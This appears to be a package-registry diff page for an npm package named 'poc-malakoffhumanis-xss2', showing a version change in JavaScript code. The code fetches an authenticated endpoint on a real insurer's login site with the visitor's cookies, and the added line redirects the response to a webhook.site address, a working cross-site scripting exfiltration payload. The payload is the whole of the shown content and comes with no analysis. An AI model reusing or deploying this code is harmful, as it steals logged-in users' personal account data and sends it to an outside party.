poc-malakoffhumanis-xss2 1.0.1 → 1.0.2
Sign up to get free protection for your applications and to get access to all the features.
package/package.json
CHANGED
@@ -3,5 +3,5 @@ const leak_url = "https://webhook.site/39bb8c4f-43f5-478e-ad53-e4547ad0fe5a"
|
|
3
3
|
fetch("https://connexion.malakoffhumanis.com/particuliers/login/api/authenticate", {
|
4
4
|
credentials: "include"
|
5
5
|
}).then(d => d.text()).then(d => {
|
6
|
-
|
6
|
+
location.href = `${leak_url}?data=${encodeURIComponent(d)}`
|
7
7
|
})
|